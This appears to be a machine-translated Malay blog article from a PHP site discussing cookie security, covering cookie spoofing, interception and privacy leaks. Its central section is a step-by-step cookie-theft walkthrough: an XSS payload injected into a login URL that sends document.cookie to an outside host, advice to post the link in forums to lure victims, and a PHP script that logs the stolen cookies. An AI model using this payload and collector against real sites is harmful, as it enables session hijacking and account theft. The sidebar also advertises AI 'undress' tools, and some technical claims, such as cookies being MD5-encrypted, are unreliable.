Rumah hujung hadapan web tutorial js Analisis mendalam isu keselamatan kuki_kuki

Analisis mendalam isu keselamatan kuki_kuki

May 16, 2016 pm 04:12 PM
cookie keselamatan

Tujuan kuki adalah untuk membawa kemudahan kepada pengguna dan menambah nilai pada tapak web Dalam keadaan biasa, mereka tidak akan menyebabkan ancaman keselamatan yang serius. Fail kuki tidak boleh dilaksanakan sebagai kod dan tidak boleh menghantar virus ia adalah hak milik kepada pengguna dan hanya boleh dibaca oleh pelayan yang menciptanya. Di samping itu, pelayar biasanya hanya membenarkan 300 kuki disimpan, dan setiap tapak boleh menyimpan sehingga 20 kuki Saiz setiap kuki adalah terhad kepada 4KB Oleh itu, kuki tidak akan mengisi cakera keras, dan tidak akan digunakan sebagai serangan "penafian perkhidmatan".

Walau bagaimanapun, sebagai pengganti identiti pengguna, keselamatan kuki kadangkala menentukan keselamatan keseluruhan sistem dan isu keselamatan kuki tidak boleh diabaikan.

(1) Cookie spoofing Kuki merekodkan maklumat seperti ID akaun pengguna dan kata laluan, dan biasanya disulitkan menggunakan kaedah MD5 sebelum dihantar dalam talian. Walaupun maklumat yang disulitkan dipintas oleh sesetengah orang dengan motif tersembunyi di Internet, ia tidak dapat difahami. Namun, masalahnya sekarang ialah orang yang memintas kuki itu tidak perlu mengetahui maksud rentetan ini Selagi dia menyerahkan kuki orang lain ke pelayan dan boleh lulus pengesahan, dia boleh berpura-pura menjadi mangsa dan log. ke laman web ini dipanggil kuki.
Pengguna haram memperoleh kunci penyulitan yang sepadan melalui penipuan kuki, dengan itu mengakses semua maklumat peribadi pengguna yang sah, termasuk e-mel pengguna dan juga maklumat akaun, menyebabkan kemudaratan serius kepada maklumat peribadi.
(2) Pintasan kuki
Kuki dihantar antara penyemak imbas dan pelayan dalam bentuk teks biasa dan dengan mudah boleh dipintas secara haram dan digunakan oleh orang lain. Kuki boleh dibaca oleh sesiapa sahaja yang boleh memintas komunikasi web.
Selepas kuki dipintas oleh pengguna haram dan kemudian dimainkan semula dalam tempoh sahnya, pengguna haram itu akan menikmati hak pengguna yang sah. Sebagai contoh, untuk bacaan dalam talian, pengguna haram boleh menikmati pembacaan majalah elektronik dalam talian tanpa membayar sebarang bayaran.

Kaedah pemintasan kuki termasuk yang berikut:

(1) Gunakan pengaturcaraan untuk memintas kuki. Kaedah dianalisis di bawah Kaedah ini diselesaikan dalam dua langkah.

Langkah 1: Cari tapak web yang perlu mengumpul kuki, menganalisisnya dan membina URL. Mula-mula, buka tapak web tempat anda ingin mengumpul kuki, dengan anggapan ia adalah http://www.XXX.net Log masuk ke tapak web dan masukkan nama pengguna "" (tanpa tanda petikan). dan tangkap paket, dan dapatkan kod berikut:
http://www.XXX.net/tXl/login/login.pl? username=&passwd=&ok.X=28&ok.y=6;
Gantikan "" dengan:
"<script>alert(document.cookie)</script>" Cuba lagi Jika perlaksanaan berjaya, mulakan bina URL:
http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
Antaranya, http://www.cbifamily.org/cbi.php ialah skrip pada hos tertentu yang boleh dikawal oleh pengguna. Ambil perhatian bahawa "+" ialah pengekodan URL bagi simbol " ", kerana " " akan dianggap sebagai ruang. URL boleh disiarkan dalam forum untuk mendorong orang lain mengklik padanya.

Langkah 2: Sediakan skrip PHP yang mengumpul kuki dan letakkannya pada tapak web yang boleh dikawal oleh pengguna Apabila orang yang tidak mengesyaki mengklik pada URL yang dibina, kod PHP boleh dilaksanakan. Kandungan khusus skrip adalah seperti berikut:

Salin kod Kod adalah seperti berikut:

$info=getenv("OUERY_STRING"); jika($info){
$fp=fopen("info.tXt","a");
fwrite($fp,!info."n"); fclose($fp);

header("Lokasi:http://www.XXX.net");
?>

Letakkan kod ini pada rangkaian dan anda boleh mengumpul kuki semua orang. Jika forum membenarkan kod HTML atau membenarkan penggunaan teg Flash, anda boleh menggunakan teknologi ini untuk mengumpul kod Kuki dan meletakkannya dalam forum, kemudian berikan siaran topik yang menarik dan tulis kandungan yang menarik, dan anda boleh dengan cepat mengumpul sejumlah besar daripada Cookies. Di forum, banyak kata laluan orang telah dicuri dengan kaedah ini.
(2) Gunakan bahaya tersembunyi kod Flash untuk memintas kuki. Terdapat fungsi getURL() dalam Flash. Flash boleh menggunakan fungsi ini untuk membuka halaman web tertentu secara automatik, yang boleh membawa pengguna ke tapak web yang mengandungi kod hasad. Contohnya, apabila pengguna sedang menikmati animasi Flash pada komputer, kod dalam bingkai animasi mungkin telah disambungkan secara senyap ke Internet dan membuka halaman yang sangat kecil yang mengandungi kod khas Halaman ini boleh mengumpul kuki dan melakukan perkara berbahaya yang lain. benda. Tapak web tidak boleh menghalang Flash daripada melakukan ini kerana ia adalah fungsi dalaman fail Flash.
(3) Kuki membocorkan privasi rangkaian
Sebab utama mengapa kuki menyebabkan kebocoran privasi dalam talian ialah: Didorong oleh kepentingan komersial. Dengan kebangkitan e-dagang dan kemunculan peluang perniagaan yang besar di Internet, beberapa laman web dan institusi menyalahgunakan kuki dan menggunakan teknologi enjin carian, teknologi perlombongan data dan juga teknologi penipuan rangkaian untuk mengumpul maklumat peribadi orang lain tanpa kebenaran pelawat, dalam untuk membina pangkalan data, pengiklanan dan tujuan mengaut keuntungan lain, mengakibatkan kebocoran privasi peribadi pengguna. "Keterbukaan penghantaran maklumat kuki. Fail kuki mempunyai proses penghantaran dan ciri teks khas. Menghantar fail Cookie-iaitu yang disulitkan tidak selamat antara pelayan dan pelanggan boleh membawa kepada kebocoran maklumat peribadi dengan mudah. ​​

Di atas adalah pemahaman peribadi saya tentang keselamatan kuki Sila betulkan saya jika terdapat sebarang ketinggalan.

Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Alat AI Hot

Undresser.AI Undress

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Clothoff.io

Penyingkiran pakaian AI

Video Face Swap

Video Face Swap

Tukar muka dalam mana-mana video dengan mudah menggunakan alat tukar muka AI percuma kami!

Alat panas

Notepad++7.3.1

Notepad++7.3.1

Editor kod yang mudah digunakan dan percuma

SublimeText3 versi Cina

SublimeText3 versi Cina

Versi Cina, sangat mudah digunakan

Hantar Studio 13.0.1

Hantar Studio 13.0.1

Persekitaran pembangunan bersepadu PHP yang berkuasa

Dreamweaver CS6

Dreamweaver CS6

Alat pembangunan web visual

SublimeText3 versi Mac

SublimeText3 versi Mac

Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

Prestasi dan keselamatan PHP5 dan PHP8: perbandingan dan penambahbaikan Prestasi dan keselamatan PHP5 dan PHP8: perbandingan dan penambahbaikan Jan 26, 2024 am 10:19 AM

PHP ialah bahasa skrip sebelah pelayan yang digunakan secara meluas yang digunakan untuk membangunkan aplikasi web. Ia telah berkembang menjadi beberapa versi, dan artikel ini akan membincangkan terutamanya perbandingan antara PHP5 dan PHP8, dengan tumpuan khusus pada peningkatan dalam prestasi dan keselamatan. Mula-mula mari kita lihat beberapa ciri PHP5. PHP5 dikeluarkan pada tahun 2004 dan memperkenalkan banyak fungsi dan ciri baharu, seperti pengaturcaraan berorientasikan objek (OOP), pengendalian pengecualian, ruang nama, dsb. Ciri-ciri ini menjadikan PHP5 lebih berkuasa dan fleksibel, membolehkan pembangun

Cabaran keselamatan dalam pembangunan Golang: Bagaimana untuk mengelak daripada dieksploitasi untuk penciptaan virus? Cabaran keselamatan dalam pembangunan Golang: Bagaimana untuk mengelak daripada dieksploitasi untuk penciptaan virus? Mar 19, 2024 pm 12:39 PM

Cabaran keselamatan dalam pembangunan Golang: Bagaimana untuk mengelak daripada dieksploitasi untuk penciptaan virus? Dengan aplikasi Golang yang luas dalam bidang pengaturcaraan, semakin ramai pembangun memilih untuk menggunakan Golang untuk membangunkan pelbagai jenis aplikasi. Walau bagaimanapun, seperti bahasa pengaturcaraan lain, terdapat cabaran keselamatan dalam pembangunan Golang. Khususnya, kuasa dan fleksibiliti Golang juga menjadikannya alat penciptaan virus yang berpotensi. Artikel ini akan membincangkan isu keselamatan dalam pembangunan Golang dan menyediakan beberapa kaedah untuk mengelakkan G

Apakah hubungan antara teknik pengurusan memori dan keselamatan dalam fungsi Java? Apakah hubungan antara teknik pengurusan memori dan keselamatan dalam fungsi Java? May 02, 2024 pm 01:06 PM

Pengurusan memori dalam Java melibatkan pengurusan memori automatik, menggunakan pengumpulan sampah dan pengiraan rujukan untuk memperuntukkan, menggunakan dan menuntut semula memori. Pengurusan memori yang berkesan adalah penting untuk keselamatan kerana ia menghalang limpahan penimbal, petunjuk liar dan kebocoran memori, dengan itu meningkatkan keselamatan program anda. Contohnya, dengan melepaskan objek yang tidak lagi diperlukan dengan betul, anda boleh mengelakkan kebocoran memori, dengan itu meningkatkan prestasi program dan mencegah ranap sistem.

Penjelasan terperinci tentang tempat kuki penyemak imbas disimpan Penjelasan terperinci tentang tempat kuki penyemak imbas disimpan Jan 19, 2024 am 09:15 AM

Dengan populariti Internet, kami menggunakan pelayar untuk melayari Internet telah menjadi satu cara hidup. Dalam penggunaan harian penyemak imbas, kita sering menghadapi situasi di mana kita perlu memasukkan kata laluan akaun, seperti membeli-belah dalam talian, rangkaian sosial, e-mel, dsb. Maklumat ini perlu direkodkan oleh penyemak imbas supaya ia tidak perlu dimasukkan lagi pada kali berikutnya anda melawat. Ini adalah apabila kuki berguna. Apakah cookies? Kuki merujuk kepada fail data kecil yang dihantar oleh pelayan ke penyemak imbas pengguna dan disimpan secara setempat Ia mengandungi gelagat pengguna beberapa tapak web.

Adakah win11 perlu memasang perisian anti-virus? Adakah win11 perlu memasang perisian anti-virus? Dec 27, 2023 am 09:42 AM

Win11 datang dengan perisian anti-virus Secara umumnya, kesan anti-virus adalah sangat baik dan tidak perlu dipasang Namun, satu-satunya kelemahan ialah virus itu dinyahpasang terlebih dahulu dan bukannya mengingatkan anda terlebih dahulu sama ada anda memerlukannya. Jika anda menerimanya, anda tidak perlu memuat turun perisian anti-virus lain. Adakah win11 perlu memasang perisian anti-virus Jawapan: Tidak. Secara umumnya, win11 disertakan dengan perisian anti-virus dan tidak memerlukan pemasangan tambahan. Jika anda tidak menyukai cara perisian anti-virus yang disertakan dengan sistem win11 dikendalikan, anda boleh memasangnya semula. Bagaimana untuk mematikan perisian anti-virus yang disertakan dengan win11: 1. Pertama, kita masukkan tetapan dan klik "Privasi dan Keselamatan". 2. Kemudian klik "Pusat Keselamatan Tetingkap". 3. Kemudian pilih "Perlindungan virus dan ancaman". 4. Akhir sekali, anda boleh mematikannya

Soalan Lazim dan Penyelesaian tentang Tetapan Kuki Soalan Lazim dan Penyelesaian tentang Tetapan Kuki Jan 19, 2024 am 09:08 AM

Masalah dan penyelesaian biasa untuk tetapan kuki, contoh kod khusus diperlukan Dengan perkembangan Internet, kuki, sebagai salah satu teknologi konvensional yang paling biasa, telah digunakan secara meluas dalam laman web dan aplikasi. Kuki, secara ringkasnya, ialah fail data yang disimpan pada komputer pengguna yang boleh digunakan untuk menyimpan maklumat pengguna di tapak web, termasuk nama log masuk, kandungan troli beli-belah, pilihan laman web, dsb. Kuki ialah alat penting untuk pembangun, tetapi pada masa yang sama, tetapan kuki sering ditemui

Cara mencari kuki dalam penyemak imbas anda Cara mencari kuki dalam penyemak imbas anda Jan 19, 2024 am 09:46 AM

Dalam penggunaan harian komputer dan Internet, kita sering terdedah kepada kuki. Kuki ialah fail teks kecil yang menyimpan rekod lawatan kami ke tapak web, keutamaan dan maklumat lain. Maklumat ini mungkin digunakan oleh tapak web untuk memberi perkhidmatan yang lebih baik kepada kami. Tetapi kadangkala, kita perlu mencari maklumat kuki untuk mencari kandungan yang kita inginkan. Jadi bagaimana kita mencari kuki dalam penyemak imbas? Pertama, kita perlu memahami di mana kuki itu wujud. dalam pelayar

Analisis keselamatan kata laluan akaun lalai Oracle Analisis keselamatan kata laluan akaun lalai Oracle Mar 09, 2024 pm 04:24 PM

Pangkalan data Oracle ialah sistem pengurusan pangkalan data hubungan yang popular Banyak perusahaan dan organisasi memilih untuk menggunakan Oracle untuk menyimpan dan mengurus data penting mereka. Dalam pangkalan data Oracle, terdapat beberapa akaun lalai dan kata laluan yang dipratetap oleh sistem, seperti sys, sistem, dsb. Dalam pengurusan pangkalan data harian dan kerja operasi dan penyelenggaraan, pentadbir perlu memberi perhatian kepada keselamatan kata laluan akaun lalai ini, kerana akaun ini mempunyai kebenaran yang lebih tinggi dan boleh menyebabkan masalah keselamatan yang serius setelah ia dieksploitasi dengan niat jahat. Artikel ini akan membincangkan lalai Oracle

See all articles